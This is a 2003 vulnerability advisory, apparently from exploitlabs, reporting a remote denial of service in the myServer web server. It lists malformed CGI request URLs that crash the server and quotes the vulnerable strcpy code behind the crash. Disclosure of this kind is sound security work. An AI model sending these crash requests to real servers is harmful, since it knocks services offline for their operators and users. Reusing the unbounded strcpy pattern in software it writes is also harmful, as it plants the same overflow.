myServer - Remote Denial of Service

2003-07-08T00:00:00
ID SECURITYVULNS:DOC:4794
Type securityvulns
Reporter Securityvulns
Modified 2003-07-08T00:00:00

Description


      - EXPL-A-2003-012 exploitlabs.com Advisory 012

                     -= myServer =-

Donnie Werner July 5, 2003

Vunerability(s):

Denial of Service

Product:

myServer httpd - 4.2 ( current ) http://myserverweb.sourceforge.net http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerWIN32EXEC-0.4.2.zip http://easynews.dl.sourceforge.net/sourceforge/myserverweb/myServerSRC-0.4.2.zip

Description of product:

"It is a web server that allow everybody to have his own web server for free. It is easy to configure and manage, it is available for linux and windows. It supports the CGI, ISAPI, WinCGI and FastCGI. Visit the homepage for more info."

note: http://www.securitytracker.com/alerts/2003/Jun/1006999.html has NOT been fixed as of ver 4.2

http://www.security-protocols.com/print.php?sid=1534 appears fixed or not an issue in 4.2 under win

VUNERABILITY / EXPLOIT

tested on Windows XP / 2k

issuing...

http://[host]/cgi-bin/math_sum.mscgi?a= http://[host]/cgi-bin/math_sum.mscgi??=

completly crashes the httpd on the remote host

proally cuz..

------------ snip ------------

strcpy(a,cm.GetParam("a")); strcpy(b,cm.GetParam("b"));

sprintf(c,"%i",atoi(a)+atoi(b));

------------ snip ------------

also.. http://[host]/cgi-bin/post.mscgi??? crashes server

Local:

no

Remote:

yes

Vendor Fix:

No fix on 0day Vendor has responded and claims the fix is in the CVS, and will be resolved as of the upcomming 4.3 release.

Vendor Contact:

Concurrent with this advisory http://sourceforge.net/tracker/?func=add&group_id=63119&atid=502904

Credits:

Donnie Werner morning_wood@exploitlabs.com http://exploitlabs.com

thank you "nutcase" for confirmation testing